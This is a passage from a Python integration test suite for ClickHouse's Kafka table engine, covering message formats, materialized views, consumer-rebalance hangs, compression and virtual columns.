            member_info['client_host'] = client_host
            member_topics_assignment = []
            # member_assignment is the kafka wire-format blob; MemberAssignment
            # decodes it into (topic, partitions) pairs.
            for (topic, partitions) in MemberAssignment.decode(member_assignment).assignment:
                member_topics_assignment.append({'topic': topic, 'partitions': partitions})
            member_info['assignment'] = member_topics_assignment
            res.append(member_info)
        return res
    finally:
        # BUGFIX: the connection was previously never closed, leaking one
        # socket per call.
        client.close()
# Fixtures
@pytest.fixture(scope="module")
def kafka_cluster():
    # Module-scoped fixture: start the docker cluster once for the whole
    # test module, hand it to the tests, and always shut it down afterwards
    # (even if startup partially failed).
    try:
        cluster.start()
        kafka_id = instance.cluster.kafka_docker_id
        print(("kafka_id is {}".format(kafka_id)))
        yield cluster
    finally:
        cluster.shutdown()
@pytest.fixture(autouse=True)
def kafka_setup_teardown():
    # Runs before every test: recreate the `test` database so each test
    # starts from a clean slate.
    instance.query('DROP DATABASE IF EXISTS test; CREATE DATABASE test;')
    # logging.debug("kafka is available - running test")
    yield  # run test
# Tests
def test_kafka_issue11308(kafka_cluster):
    """Regression for ClickHouse/ClickHouse#11308: a materialized view over a
    Kafka table must respect the Kafka table's SETTINGS (here
    ``input_format_import_nested_json``)."""
    # Check that matview does respect Kafka SETTINGS
    kafka_produce(kafka_cluster, 'issue11308', ['{"t": 123, "e": {"x": "woof"} }', '{"t": 123, "e": {"x": "woof"} }',
                                                '{"t": 124, "e": {"x": "test"} }'])
    instance.query('''
        CREATE TABLE test.persistent_kafka (
            time UInt64,
            some_string String
        )
        ENGINE = MergeTree()
        ORDER BY time;

        CREATE TABLE test.kafka (t UInt64, `e.x` String)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'issue11308',
                     kafka_group_name = 'issue11308',
                     kafka_format = 'JSONEachRow',
                     kafka_row_delimiter = '\\n',
                     kafka_flush_interval_ms=1000,
                     input_format_import_nested_json = 1;

        CREATE MATERIALIZED VIEW test.persistent_kafka_mv TO test.persistent_kafka AS
        SELECT
            `t` AS `time`,
            `e.x` AS `some_string`
        FROM test.kafka;
        ''')

    # Poll until all three produced rows land in the target table.
    while int(instance.query('SELECT count() FROM test.persistent_kafka')) < 3:
        time.sleep(1)

    result = instance.query('SELECT * FROM test.persistent_kafka ORDER BY time;')

    instance.query('''
        DROP TABLE test.persistent_kafka;
        DROP TABLE test.persistent_kafka_mv;
    ''')

    expected = '''\
123	woof
123	woof
124	test
'''
    assert TSV(result) == TSV(expected)
def test_kafka_issue4116(kafka_cluster):
    """Regression for ClickHouse/ClickHouse#4116: format settings such as
    ``format_csv_delimiter`` must be applied to Kafka-engine reads."""
    # Check that format_csv_delimiter parameter works now - as part of all available format settings.
    # The last message deliberately packs several '\n'-separated rows into
    # one Kafka message.
    kafka_produce(kafka_cluster, 'issue4116', ['1|foo', '2|bar', '42|answer', '100|multi\n101|row\n103|message'])

    instance.query('''
        CREATE TABLE test.kafka (a UInt64, b String)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'issue4116',
                     kafka_group_name = 'issue4116',
                     kafka_commit_on_select = 1,
                     kafka_format = 'CSV',
                     kafka_row_delimiter = '\\n',
                     format_csv_delimiter = '|';
        ''')

    result = instance.query('SELECT * FROM test.kafka ORDER BY a;')

    expected = '''\
1	foo
2	bar
42	answer
100	multi
101	row
103	message
'''
    assert TSV(result) == TSV(expected)
def test_kafka_consumer_hang(kafka_cluster):
    """Pause the broker container to provoke a heartbeat failure / rebalance,
    then verify that DROP TABLE on the Kafka table does not hang."""
    admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))

    topic_name = "consumer_hang"
    kafka_create_topic(admin_client, topic_name, num_partitions=8)

    instance.query(f'''
        DROP TABLE IF EXISTS test.kafka;
        DROP TABLE IF EXISTS test.view;
        DROP TABLE IF EXISTS test.consumer;

        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = '{topic_name}',
                     kafka_group_name = '{topic_name}',
                     kafka_format = 'JSONEachRow',
                     kafka_num_consumers = 8;
        CREATE TABLE test.view (key UInt64, value UInt64) ENGINE = Memory();
        CREATE MATERIALIZED VIEW test.consumer TO test.view AS SELECT * FROM test.kafka;
        ''')

    # Wait until all 8 consumers have polled an empty topic.
    instance.wait_for_log_line('kafka.*Stalled', repetitions=20)

    # This should trigger heartbeat fail,
    # which will trigger REBALANCE_IN_PROGRESS,
    # and which can lead to consumer hang.
    kafka_cluster.pause_container('kafka1')
    instance.wait_for_log_line('heartbeat error')
    kafka_cluster.unpause_container('kafka1')

    # logging.debug("Attempt to drop")
    instance.query('DROP TABLE test.kafka')

    # kafka_cluster.open_bash_shell('instance')

    instance.query('''
        DROP TABLE test.consumer;
        DROP TABLE test.view;
    ''')

    # original problem appearance was a sequence of the following messages in librdkafka logs:
    # BROKERFAIL -> |ASSIGN| -> REBALANCE_IN_PROGRESS -> "waiting for rebalance_cb" (repeated forever)
    # so it was waiting forever while the application will execute queued rebalance callback

    # from a user perspective: we expect no hanging 'drop' queries
    # 'dr'||'op' to avoid self matching
    assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0

    # cleanup unread messages so kafka will not wait reading consumers to delete topic
    instance.query(f'''
        CREATE TABLE test.kafka (key UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = '{topic_name}',
                     kafka_commit_on_select = 1,
                     kafka_group_name = '{topic_name}',
                     kafka_format = 'JSONEachRow',
                     kafka_num_consumers = 8;
        ''')

    num_read = int(instance.query('SELECT count() FROM test.kafka'))
    logging.debug(f"read {num_read} from {topic_name} before delete")
    instance.query('DROP TABLE test.kafka')
    kafka_delete_topic(admin_client, topic_name)
def test_kafka_consumer_hang2(kafka_cluster):
    """Two Kafka tables in the same consumer group force a rebalance; DROP on
    either table must not hang (librdkafka issues #2077 / #2898)."""
    admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))

    topic_name = "consumer_hang2"
    kafka_create_topic(admin_client, topic_name)

    instance.query('''
        DROP TABLE IF EXISTS test.kafka;

        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'consumer_hang2',
                     kafka_group_name = 'consumer_hang2',
                     kafka_commit_on_select = 1,
                     kafka_format = 'JSONEachRow';

        CREATE TABLE test.kafka2 (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'consumer_hang2',
                     kafka_commit_on_select = 1,
                     kafka_group_name = 'consumer_hang2',
                     kafka_format = 'JSONEachRow';
        ''')

    # first consumer subscribe the topic, try to poll some data, and go to rest
    instance.query('SELECT * FROM test.kafka')

    # second consumer do the same leading to rebalance in the first
    # consumer, try to poll some data
    instance.query('SELECT * FROM test.kafka2')

    # echo 'SELECT * FROM test.kafka; SELECT * FROM test.kafka2; DROP TABLE test.kafka;' | clickhouse client -mn &
    # kafka_cluster.open_bash_shell('instance')

    # first consumer has pending rebalance callback unprocessed (no poll after select)
    # one of those queries was failing because of
    # https://github.com/edenhill/librdkafka/issues/2077
    # https://github.com/edenhill/librdkafka/issues/2898
    instance.query('DROP TABLE test.kafka')
    instance.query('DROP TABLE test.kafka2')

    # from a user perspective: we expect no hanging 'drop' queries
    # 'dr'||'op' to avoid self matching
    assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
    kafka_delete_topic(admin_client, topic_name)
def test_kafka_csv_with_delimiter(kafka_cluster):
    """Produce 50 CSV rows and read them back via SELECT from a Kafka table,
    accumulating until the reference file is matched."""
    messages = ['{i}, {i}'.format(i=i) for i in range(50)]
    kafka_produce(kafka_cluster, 'csv', messages)

    instance.query('''
        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'csv',
                     kafka_commit_on_select = 1,
                     kafka_group_name = 'csv',
                     kafka_format = 'CSV';
        ''')

    # Keep selecting (each SELECT may return only part of the data) until
    # everything produced has been received.
    result = ''
    while not kafka_check_result(result):
        result += instance.query('SELECT * FROM test.kafka', ignore_error=True)

    kafka_check_result(result, True)
def test_kafka_tsv_with_delimiter(kafka_cluster):
    """Produce 50 TSV rows and read them back via SELECT from a Kafka table,
    accumulating until the reference file is matched."""
    messages = ['{i}\t{i}'.format(i=i) for i in range(50)]
    kafka_produce(kafka_cluster, 'tsv', messages)

    instance.query('''
        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'tsv',
                     kafka_commit_on_select = 1,
                     kafka_group_name = 'tsv',
                     kafka_format = 'TSV';
        ''')

    # Keep selecting (each SELECT may return only part of the data) until
    # everything produced has been received.
    result = ''
    while not kafka_check_result(result):
        result += instance.query('SELECT * FROM test.kafka', ignore_error=True)

    kafka_check_result(result, True)
def test_kafka_select_empty(kafka_cluster):
    """SELECT from a Kafka table over an empty topic must return zero rows
    (and terminate rather than block)."""
    admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
    topic_name = "empty"
    kafka_create_topic(admin_client, topic_name)

    instance.query(f'''
        CREATE TABLE test.kafka (key UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = '{topic_name}',
                     kafka_commit_on_select = 1,
                     kafka_group_name = '{topic_name}',
                     kafka_format = 'TSV',
                     kafka_row_delimiter = '\\n';
        ''')

    assert int(instance.query('SELECT count() FROM test.kafka')) == 0
    kafka_delete_topic(admin_client, topic_name)
def test_kafka_json_without_delimiter(kafka_cluster):
    """JSONEachRow parsing of Kafka messages that each carry a batch of 25
    newline-separated JSON rows (no explicit kafka_row_delimiter)."""
    # Two messages, 25 rows apiece, covering keys 0..49.
    for lo, hi in ((0, 25), (25, 50)):
        batch = ''.join(json.dumps({'key': i, 'value': i}) + '\n' for i in range(lo, hi))
        kafka_produce(kafka_cluster, 'json', [batch])

    instance.query('''
        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'json',
                     kafka_group_name = 'json',
                     kafka_commit_on_select = 1,
                     kafka_format = 'JSONEachRow';
        ''')

    # Accumulate partial SELECT results until the reference file is matched.
    result = ''
    while not kafka_check_result(result):
        result += instance.query('SELECT * FROM test.kafka', ignore_error=True)

    kafka_check_result(result, True)
def test_kafka_protobuf(kafka_cluster):
    """Read length-delimited Protobuf messages (kafka.proto:KeyValuePair)
    through a Kafka table."""
    # Three produces in uneven chunks (20 + 1 + 29 = 50 messages).
    kafka_produce_protobuf_messages(kafka_cluster, 'pb', 0, 20)
    kafka_produce_protobuf_messages(kafka_cluster, 'pb', 20, 1)
    kafka_produce_protobuf_messages(kafka_cluster, 'pb', 21, 29)

    instance.query('''
        CREATE TABLE test.kafka (key UInt64, value String)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'pb',
                     kafka_group_name = 'pb',
                     kafka_format = 'Protobuf',
                     kafka_commit_on_select = 1,
                     kafka_schema = 'kafka.proto:KeyValuePair';
        ''')

    # Accumulate partial SELECT results until the reference file is matched.
    result = ''
    while True:
        result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
        if kafka_check_result(result):
            break

    kafka_check_result(result, True)
def test_kafka_string_field_on_first_position_in_protobuf(kafka_cluster):
    """Regression for ClickHouse/ClickHouse#12615: Protobuf messages whose
    FIRST field is a string must be parsed correctly."""
    # https://github.com/ClickHouse/ClickHouse/issues/12615
    kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 0, 20)
    kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 20, 1)
    kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 21, 29)

    instance.query('''
        CREATE TABLE test.kafka (
            username String,
            timestamp Int32
          ) ENGINE = Kafka()
        SETTINGS
            kafka_broker_list = 'kafka1:19092',
            kafka_topic_list = 'string_field_on_first_position_in_protobuf',
            kafka_group_name = 'string_field_on_first_position_in_protobuf',
            kafka_format = 'Protobuf',
            kafka_commit_on_select = 1,
            kafka_schema = 'social:User';
        ''')

    result = instance.query('SELECT * FROM test.kafka', ignore_error=True)
    expected = '''\
John Doe 0	1000000
John Doe 1	1000001
John Doe 2	1000002
John Doe 3	1000003
John Doe 4	1000004
John Doe 5	1000005
John Doe 6	1000006
John Doe 7	1000007
John Doe 8	1000008
John Doe 9	1000009
John Doe 10	1000010
John Doe 11	1000011
John Doe 12	1000012
John Doe 13	1000013
John Doe 14	1000014
John Doe 15	1000015
John Doe 16	1000016
John Doe 17	1000017
John Doe 18	1000018
John Doe 19	1000019
John Doe 20	1000020
John Doe 21	1000021
John Doe 22	1000022
John Doe 23	1000023
John Doe 24	1000024
John Doe 25	1000025
John Doe 26	1000026
John Doe 27	1000027
John Doe 28	1000028
John Doe 29	1000029
John Doe 30	1000030
John Doe 31	1000031
John Doe 32	1000032
John Doe 33	1000033
John Doe 34	1000034
John Doe 35	1000035
John Doe 36	1000036
John Doe 37	1000037
John Doe 38	1000038
John Doe 39	1000039
John Doe 40	1000040
John Doe 41	1000041
John Doe 42	1000042
John Doe 43	1000043
John Doe 44	1000044
John Doe 45	1000045
John Doe 46	1000046
John Doe 47	1000047
John Doe 48	1000048
John Doe 49	1000049
'''
    assert TSV(result) == TSV(expected)
def test_kafka_protobuf_no_delimiter(kafka_cluster):
    """ProtobufSingle round-trip: read non-delimited protobuf messages, then
    write through a Kafka table and read the result back."""
    instance.query('''
        CREATE TABLE test.kafka (key UInt64, value String)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'pb_no_delimiter',
                     kafka_group_name = 'pb_no_delimiter',
                     kafka_format = 'ProtobufSingle',
                     kafka_commit_on_select = 1,
                     kafka_schema = 'kafka.proto:KeyValuePair';
        ''')

    kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 0, 20)
    kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 20, 1)
    kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 21, 29)

    # Accumulate partial SELECT results until the reference file is matched.
    result = ''
    while True:
        result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
        if kafka_check_result(result):
            break

    kafka_check_result(result, True)

    # Now exercise the write path with the same format.
    instance.query('''
    CREATE TABLE test.kafka_writer (key UInt64, value String)
        ENGINE = Kafka
        SETTINGS kafka_broker_list = 'kafka1:19092',
                 kafka_topic_list = 'pb_no_delimiter',
                 kafka_group_name = 'pb_no_delimiter',
                 kafka_format = 'ProtobufSingle',
                 kafka_commit_on_select = 1,
                 kafka_schema = 'kafka.proto:KeyValuePair';
    ''')

    instance.query("INSERT INTO test.kafka_writer VALUES (13,'Friday'),(42,'Answer to the Ultimate Question of Life, the Universe, and Everything'), (110, 'just a number')")

    time.sleep(1)

    result = instance.query("SELECT * FROM test.kafka ORDER BY key", ignore_error=True)

    expected = '''\
13	Friday
42	Answer to the Ultimate Question of Life, the Universe, and Everything
110	just a number
'''
    assert TSV(result) == TSV(expected)
def test_kafka_materialized_view(kafka_cluster):
    """Basic pipeline: Kafka table -> materialized view -> MergeTree table."""
    instance.query('''
        DROP TABLE IF EXISTS test.view;
        DROP TABLE IF EXISTS test.consumer;
        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'mv',
                     kafka_group_name = 'mv',
                     kafka_format = 'JSONEachRow',
                     kafka_row_delimiter = '\\n';
        CREATE TABLE test.view (key UInt64, value UInt64)
            ENGINE = MergeTree()
            ORDER BY key;
        CREATE MATERIALIZED VIEW test.consumer TO test.view AS
            SELECT * FROM test.kafka;
    ''')

    messages = []
    for i in range(50):
        messages.append(json.dumps({'key': i, 'value': i}))
    kafka_produce(kafka_cluster, 'mv', messages)

    # Poll the target table until all 50 rows have been delivered by the MV.
    while True:
        result = instance.query('SELECT * FROM test.view')
        if kafka_check_result(result):
            break

    instance.query('''
        DROP TABLE test.consumer;
        DROP TABLE test.view;
    ''')

    kafka_check_result(result, True)
def test_kafka_recreate_kafka_table(kafka_cluster):
    '''
    Checks that materialized view work properly after dropping and recreating the Kafka table.
    '''
    # line for backporting:
    # admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
    admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))

    topic_name = "recreate_kafka_table"
    kafka_create_topic(admin_client, topic_name, num_partitions=6)

    instance.query('''
        DROP TABLE IF EXISTS test.view;
        DROP TABLE IF EXISTS test.consumer;

        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'recreate_kafka_table',
                     kafka_group_name = 'recreate_kafka_table_group',
                     kafka_format = 'JSONEachRow',
                     kafka_num_consumers = 6,
                     kafka_flush_interval_ms = 1000,
                     kafka_skip_broken_messages = 1048577;

        CREATE TABLE test.view (key UInt64, value UInt64)
            ENGINE = MergeTree()
            ORDER BY key;
        CREATE MATERIALIZED VIEW test.consumer TO test.view AS
            SELECT * FROM test.kafka;
    ''')

    # First batch of 120 messages, consumed while the Kafka table exists.
    messages = []
    for i in range(120):
        messages.append(json.dumps({'key': i, 'value': i}))
    kafka_produce(kafka_cluster,'recreate_kafka_table', messages)

    instance.wait_for_log_line('kafka.*Committed offset [0-9]+.*recreate_kafka_table', repetitions=6, look_behind_lines=100)

    instance.query('''
        DROP TABLE test.kafka;
    ''')

    # Second batch produced while the Kafka table is dropped; it must be
    # picked up after the table is recreated with the same consumer group.
    kafka_produce(kafka_cluster,'recreate_kafka_table', messages)

    instance.query('''
        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'recreate_kafka_table',
                     kafka_group_name = 'recreate_kafka_table_group',
                     kafka_format = 'JSONEachRow',
                     kafka_num_consumers = 6,
                     kafka_flush_interval_ms = 1000,
                     kafka_skip_broken_messages = 1048577;
    ''')

    instance.wait_for_log_line('kafka.*Committed offset [0-9]+.*recreate_kafka_table', repetitions=6, look_behind_lines=100)

    # data was not flushed yet (it will be flushed 7.5 sec after creating MV)
    assert int(instance.query("SELECT count() FROM test.view")) == 240

    instance.query('''
        DROP TABLE test.consumer;
        DROP TABLE test.view;
    ''')
    kafka_delete_topic(admin_client, topic_name)
def test_librdkafka_compression(kafka_cluster):
    """
    Regression for UB in snappy-c (that is used in librdkafka),
    backport pr is [1].

      [1]: https://github.com/ClickHouse-Extras/librdkafka/pull/3

    Example of corruption:

        2020.12.10 09:59:56.831507 [ 20 ] {} <Error> void DB::StorageKafka::threadFunc(size_t): Code: 27. DB::Exception: Cannot parse input: expected '"' before: 'foo"}': (while reading the value of key value): (at row 1)

    To trigger this regression there should be duplicated messages

    Original reproducer is:

        $ gcc --version |& fgrep gcc
        gcc (GCC) 10.2.0
        $ yes foobarbaz | fold -w 80 | head -n10 >| in-…
        $ make clean && make CFLAGS='-Wall -g -O2 -ftree-loop-vectorize -DNDEBUG=1 -DSG=1 -fPIC'
        $ ./verify in
        final comparision of in failed at 20 of 100
    """

    supported_compression_types = ['gzip', 'snappy', 'lz4', 'zstd', 'uncompressed']

    messages = []
    expected = []

    # Long repetitive values make compression effective, which is what
    # triggered the original snappy corruption.
    value = 'foobarbaz'*10
    number_of_messages = 50
    for i in range(number_of_messages):
        messages.append(json.dumps({'key': i, 'value': value}))
        expected.append(f'{i}\t{value}')

    expected = '\n'.join(expected)

    for compression_type in supported_compression_types:
        logging.debug(('Check compression {}'.format(compression_type)))

        topic_name = 'test_librdkafka_compression_{}'.format(compression_type)
        admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))

        # Compression is configured on the topic, so librdkafka has to
        # decompress on the consumer side.
        kafka_create_topic(admin_client, topic_name, config={'compression.type': compression_type})

        instance.query('''
            CREATE TABLE test.kafka (key UInt64, value String)
                ENGINE = Kafka
                SETTINGS kafka_broker_list = 'kafka1:19092',
                         kafka_topic_list = '{topic_name}',
                         kafka_group_name = '{topic_name}_group',
                         kafka_format = 'JSONEachRow',
                         kafka_flush_interval_ms = 1000;
            CREATE MATERIALIZED VIEW test.consumer Engine=Log AS
                SELECT * FROM test.kafka;
        '''.format(topic_name=topic_name) )

        kafka_produce(kafka_cluster, topic_name, messages)

        instance.wait_for_log_line("Committed offset {}".format(number_of_messages))

        result = instance.query('SELECT * FROM test.consumer')
        assert TSV(result) == TSV(expected)

        instance.query('DROP TABLE test.kafka SYNC')
        instance.query('DROP TABLE test.consumer SYNC')
        kafka_delete_topic(admin_client, topic_name)
def test_kafka_materialized_view_with_subquery(kafka_cluster):
    """Same as test_kafka_materialized_view but the MV selects from a
    subquery over the Kafka table."""
    instance.query('''
        DROP TABLE IF EXISTS test.view;
        DROP TABLE IF EXISTS test.consumer;
        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'mvsq',
                     kafka_group_name = 'mvsq',
                     kafka_format = 'JSONEachRow',
                     kafka_row_delimiter = '\\n';
        CREATE TABLE test.view (key UInt64, value UInt64)
            ENGINE = MergeTree()
            ORDER BY key;
        CREATE MATERIALIZED VIEW test.consumer TO test.view AS
            SELECT * FROM (SELECT * FROM test.kafka);
    ''')

    messages = []
    for i in range(50):
        messages.append(json.dumps({'key': i, 'value': i}))
    kafka_produce(kafka_cluster, 'mvsq', messages)

    # Poll the target table until all 50 rows have been delivered by the MV.
    while True:
        result = instance.query('SELECT * FROM test.view')
        if kafka_check_result(result):
            break

    instance.query('''
        DROP TABLE test.consumer;
        DROP TABLE test.view;
    ''')

    kafka_check_result(result, True)
def test_kafka_many_materialized_views(kafka_cluster):
    """Two materialized views attached to one Kafka table must both receive
    every message."""
    instance.query('''
        DROP TABLE IF EXISTS test.view1;
        DROP TABLE IF EXISTS test.view2;
        DROP TABLE IF EXISTS test.consumer1;
        DROP TABLE IF EXISTS test.consumer2;
        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'mmv',
                     kafka_group_name = 'mmv',
                     kafka_format = 'JSONEachRow',
                     kafka_row_delimiter = '\\n';
        CREATE TABLE test.view1 (key UInt64, value UInt64)
            ENGINE = MergeTree()
            ORDER BY key;
        CREATE TABLE test.view2 (key UInt64, value UInt64)
            ENGINE = MergeTree()
            ORDER BY key;
        CREATE MATERIALIZED VIEW test.consumer1 TO test.view1 AS
            SELECT * FROM test.kafka;
        CREATE MATERIALIZED VIEW test.consumer2 TO test.view2 AS
            SELECT * FROM test.kafka;
    ''')

    messages = []
    for i in range(50):
        messages.append(json.dumps({'key': i, 'value': i}))
    kafka_produce(kafka_cluster, 'mmv', messages)

    # Both target tables must independently converge to the full data set.
    while True:
        result1 = instance.query('SELECT * FROM test.view1')
        result2 = instance.query('SELECT * FROM test.view2')
        if kafka_check_result(result1) and kafka_check_result(result2):
            break

    instance.query('''
        DROP TABLE test.consumer1;
        DROP TABLE test.consumer2;
        DROP TABLE test.view1;
        DROP TABLE test.view2;
    ''')

    kafka_check_result(result1, True)
    kafka_check_result(result2, True)
def test_kafka_flush_on_big_message(kafka_cluster):
    """Ensure every row is flushed when each Kafka message is a big (~100 KB) batch.

    Produces `kafka_messages` Kafka messages, each consisting of
    `batch_messages` concatenated JSON rows, then waits until all rows reach
    test.view through the materialized-view pipeline.
    """
    kafka_messages = 1000
    batch_messages = 1000
    # One Kafka message = batch_messages JSON rows glued together (~100 KB).
    messages = [json.dumps({'key': i, 'value': 'x' * 100}) * batch_messages for i in range(kafka_messages)]
    kafka_produce(kafka_cluster, 'flush', messages)

    instance.query('''
        DROP TABLE IF EXISTS test.view;
        DROP TABLE IF EXISTS test.consumer;
        CREATE TABLE test.kafka (key UInt64, value String)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'flush',
                     kafka_group_name = 'flush',
                     kafka_format = 'JSONEachRow',
                     kafka_max_block_size = 10;
        CREATE TABLE test.view (key UInt64, value String)
            ENGINE = MergeTree
            ORDER BY key;
        CREATE MATERIALIZED VIEW test.consumer TO test.view AS
            SELECT * FROM test.kafka;
    ''')

    client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))

    # Wait until the consumer group has committed offsets for all messages.
    received = False
    while not received:
        try:
            offsets = client.list_consumer_group_offsets('flush')
            for topic, offset in list(offsets.items()):
                if topic.topic == 'flush' and offset.offset == kafka_messages:
                    received = True
                    break
        except kafka.errors.GroupCoordinatorNotAvailableError:
            # Coordinator may not be elected yet right after the group appears.
            pass
        if not received:
            time.sleep(0.5)  # fix: don't hammer the admin API in a tight busy loop

    # Wait until every row has landed in the target table.
    while True:
        result = instance.query('SELECT count() FROM test.view')
        if int(result) == kafka_messages * batch_messages:
            break
        time.sleep(0.5)  # fix: poll politely instead of busy-waiting

    instance.query('''
        DROP TABLE test.consumer;
        DROP TABLE test.view;
    ''')

    assert int(result) == kafka_messages * batch_messages, 'ClickHouse lost some messages: {}'.format(result)
def test_kafka_virtual_columns(kafka_cluster):
    """Check Kafka virtual columns (_key, _topic, _offset, _partition, _timestamp) on direct SELECT."""
    admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
    topic_config = {
        # default retention, since predefined timestamp_ms is used.
        'retention.ms': '-1',
    }
    kafka_create_topic(admin_client, "virt1", config=topic_config)

    instance.query('''
        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'virt1',
                     kafka_group_name = 'virt1',
                     kafka_commit_on_select = 1,
                     kafka_format = 'JSONEachRow';
    ''')

    # Two Kafka messages, each packing 25 newline-separated JSON rows, both to partition 0.
    first_half = ''.join(json.dumps({'key': n, 'value': n}) + '\n' for n in range(25))
    kafka_produce(kafka_cluster, 'virt1', [first_half], 0)
    second_half = ''.join(json.dumps({'key': n, 'value': n}) + '\n' for n in range(25, 50))
    kafka_produce(kafka_cluster, 'virt1', [second_half], 0)

    # Accumulate SELECT output until it matches the reference file.
    result = ''
    while True:
        result += instance.query(
            '''SELECT _key, key, _topic, value, _offset, _partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) AS _timestamp FROM test.kafka''',
            ignore_error=True)
        if kafka_check_result(result, False, 'test_kafka_virtual1.reference'):
            break

    kafka_check_result(result, True, 'test_kafka_virtual1.reference')
def test_kafka_virtual_columns_with_materialized_view(kafka_cluster):
    """Check that Kafka virtual columns can be captured into a table by a materialized view."""
    admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
    topic_config = {
        # default retention, since predefined timestamp_ms is used.
        'retention.ms': '-1',
    }
    kafka_create_topic(admin_client, "virt2", config=topic_config)

    instance.query('''
        DROP TABLE IF EXISTS test.view;
        DROP TABLE IF EXISTS test.consumer;
        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'virt2',
                     kafka_group_name = 'virt2',
                     kafka_format = 'JSONEachRow',
                     kafka_row_delimiter = '\\n';
        CREATE TABLE test.view (key UInt64, value UInt64, kafka_key String, topic String, offset UInt64, partition UInt64, timestamp Nullable(DateTime('UTC')))
            ENGINE = MergeTree()
            ORDER BY key;
        CREATE MATERIALIZED VIEW test.consumer TO test.view AS
            SELECT *, _key as kafka_key, _topic as topic, _offset as offset, _partition as partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) as timestamp FROM test.kafka;
    ''')

    # 50 single-row messages, all to partition 0.
    kafka_produce(kafka_cluster, 'virt2', [json.dumps({'key': n, 'value': n}) for n in range(50)], 0)

    sql = 'SELECT kafka_key, key, topic, value, offset, partition, timestamp FROM test.view ORDER BY kafka_key, key'
    result = instance.query(sql)

    # Re-poll up to 10 times (3 s apart) until the view matches the reference.
    attempts = 0
    while not kafka_check_result(result, False, 'test_kafka_virtual2.reference') and attempts < 10:
        time.sleep(3)
        attempts += 1
        result = instance.query(sql)

    kafka_check_result(result, True, 'test_kafka_virtual2.reference')

    instance.query('''
        DROP TABLE test.consumer;
        DROP TABLE test.view;
    ''')
def test_kafka_insert(kafka_cluster):
    """INSERT into a Kafka engine table, then read the rows back with kafka_consume."""
    instance.query('''
        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'insert1',
                     kafka_group_name = 'insert1',
                     kafka_format = 'TSV',
                     kafka_commit_on_select = 1,
                     kafka_row_delimiter = '\\n';
    ''')

    values = ','.join("({i}, {i})".format(i=n) for n in range(50))

    # Retry the INSERT while the producer is still establishing its connection.
    while True:
        try:
            instance.query("INSERT INTO test.kafka VALUES {}".format(values))
            break
